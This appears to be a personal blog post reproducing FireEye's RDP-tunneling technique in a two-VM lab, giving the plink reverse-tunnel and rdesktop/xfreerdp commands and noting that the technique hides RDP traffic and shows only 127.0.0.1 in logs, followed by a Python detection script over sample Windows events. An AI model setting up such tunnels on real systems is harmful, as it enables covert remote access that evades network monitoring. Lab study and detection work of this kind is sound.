
Thursday, February 20, 2020

FireEye RDP Tunneling walk-through

https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html

set up 2 VMs, both set to "internal network" in Oracle VirtualBox
1 VM is Windows 10
1 VM is Kali Linux
ensure they can ping each other

setup in windows 10 vm
- download plink.exe from putty website

setup in kali linux vm
- edit /etc/ssh/sshd_config to allow root ssh (PermitRootLogin yes)
- restart or start ssh server (systemctl start ssh.service, systemctl restart ssh.service)
- check status of ssh to ensure it's running (systemctl status ssh)

steps to perform rdp tunneling
1.) on windows victim box
     plink.exe root@kaliLinuxIPAddress -P 22 -2 -4 -T -N -C -R 12345:127.0.0.1:3389

   (note: this sets up an SSH tunnel from your Windows victim box to your Linux attacker box; the -R option makes port 12345 on the attacker box forward back through that tunnel to port 3389 (RDP) on the victim. kaliLinuxIPAddress is replaced with the IP of your attacker box, and root is replaced with whatever account you want to ssh with. You should see an SSH connection going from the Windows box to the attacker box on port 22, and nothing else.)

2.) then on the kali linux box
     rdesktop -u VictimAccount 127.0.0.1:12345

     or

     xfreerdp /u:VictimAccount 127.0.0.1:12345

     or
 
     use Remmina for RDP and connect to 127.0.0.1:12345 (this is what worked best for me on Windows 10; the others did not appear to support the proper network authentication encryption)

     (note: you should now have a remote desktop session to the victim box open from your attacker box. The interesting thing is that you won't see any RDP traffic on the wire, only the already established SSH connection/tunnel on port 22. On the victim box you also won't see any traffic in the logs from the attacker box's IP; you'll only see a source IP of 127.0.0.1 on everything, such as in the remote desktop logs.)
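The loopback source address mentioned in that note is exactly what a defender can key on. The following detection sketch is an added example and is not code from this post or from the FireEye write-up. It runs over constructed sample records: a flattened key=value rendering of Windows Security event 4624 (logon, type 10 = RemoteInteractive) and TerminalServices-RemoteConnectionManager event 1149 (RDP network connection), plus a netstat-style connection table from the same host. Real events arrive as EVTX/XML, so the field names are the standard ones but the one-line layout is an assumption for the example. It flags RDP activity sourced from 127.0.0.1/::1, ignores loopback logons of other types (which are normal), and raises confidence when the host also holds a live outbound SSH client connection, the other half of the tunnel described above.

```python
import re
from dataclasses import dataclass
from typing import Dict, List

# Constructed sample records (not real logs): a flattened key=value rendering of
# Windows Security event 4624 and TerminalServices event 1149. Only the fields
# used below are kept.
SAMPLE_EVENTS = [
    "EventID=4624 LogonType=10 TargetUserName=VictimAccount IpAddress=127.0.0.1 IpPort=49211",
    "EventID=4624 LogonType=10 TargetUserName=alice IpAddress=10.0.2.15 IpPort=50102",
    "EventID=4624 LogonType=2 TargetUserName=bob IpAddress=- IpPort=-",
    "EventID=4624 LogonType=3 TargetUserName=svc IpAddress=127.0.0.1 IpPort=445",
    "EventID=1149 User=VictimAccount SourceNetworkAddress=127.0.0.1",
    "EventID=1149 User=alice SourceNetworkAddress=10.0.2.15",
]

# Constructed connection table (netstat-style) from the same host: the victim's
# outbound SSH session that carries the tunnel, plus ordinary sockets.
SAMPLE_CONNECTIONS = [
    "proto=TCP local=10.0.2.4:49700 remote=10.0.2.5:22 state=ESTABLISHED process=plink.exe",
    "proto=TCP local=0.0.0.0:3389 remote=0.0.0.0:0 state=LISTENING process=svchost.exe",
    "proto=TCP local=10.0.2.4:49702 remote=10.0.2.20:443 state=ESTABLISHED process=msedge.exe",
]


@dataclass
class Finding:
    event_id: int
    user: str
    source: str
    reason: str


def parse_kv(line: str) -> Dict[str, str]:
    """Split 'key=value key=value ...' into a dict (values contain no spaces here)."""
    return dict(re.findall(r"(\w+)=(\S+)", line))


def is_loopback(addr: str) -> bool:
    """True for IPv4 127.0.0.0/8 and IPv6 ::1; '-' or empty fields are not loopback."""
    return addr.startswith("127.") or addr == "::1"


def find_loopback_rdp(events: List[str]) -> List[Finding]:
    """Flag RDP activity whose recorded source address is the host itself.

    A tunnelled RDP session terminates on the victim's own loopback interface,
    so 4624 logon type 10 (RemoteInteractive) and 1149 records carry 127.0.0.1
    instead of the real client. Loopback logons of other types (e.g. type 3 to
    a local share) are routine and are deliberately not flagged.
    """
    findings: List[Finding] = []
    for line in events:
        f = parse_kv(line)
        eid = int(f.get("EventID", "0"))
        if eid == 4624 and f.get("LogonType") == "10" and is_loopback(f.get("IpAddress", "")):
            findings.append(Finding(4624, f["TargetUserName"], f["IpAddress"],
                                    "RemoteInteractive logon sourced from loopback"))
        elif eid == 1149 and is_loopback(f.get("SourceNetworkAddress", "")):
            findings.append(Finding(1149, f["User"], f["SourceNetworkAddress"],
                                    "RDP connection sourced from loopback"))
    return findings


def outbound_ssh_processes(connections: List[str]) -> List[str]:
    """Names of processes holding an ESTABLISHED outbound TCP connection to port 22."""
    procs: List[str] = []
    for line in connections:
        c = parse_kv(line)
        remote_port = c.get("remote", "").rsplit(":", 1)[-1]
        if c.get("proto") == "TCP" and c.get("state") == "ESTABLISHED" and remote_port == "22":
            procs.append(c.get("process", "?"))
    return procs


def assess(events: List[str], connections: List[str]) -> dict:
    """Combine both signals: loopback-sourced RDP plus a live outbound SSH client
    on the same host is a strong indicator of the reverse-tunnel technique."""
    findings = find_loopback_rdp(events)
    ssh_procs = outbound_ssh_processes(connections)
    return {
        "loopback_rdp": findings,
        "outbound_ssh": ssh_procs,
        "tunnel_suspected": bool(findings) and bool(ssh_procs),
    }


if __name__ == "__main__":
    result = assess(SAMPLE_EVENTS, SAMPLE_CONNECTIONS)
    for fnd in result["loopback_rdp"]:
        print(f"[{fnd.event_id}] user={fnd.user} src={fnd.source}: {fnd.reason}")
    print("outbound SSH clients:", result["outbound_ssh"])
    print("tunnel suspected:", result["tunnel_suspected"])
```

On the constructed input this reports the two VictimAccount records (4624 type 10 and 1149, both from 127.0.0.1), names plink.exe as the outbound SSH client, and marks the tunnel as suspected; the type-3 loopback logon and the remote-sourced sessions for alice are left alone. In a real deployment the same two checks map onto a SIEM rule over the Security and TerminalServices channels and an EDR query for non-standard processes with established connections to TCP/22.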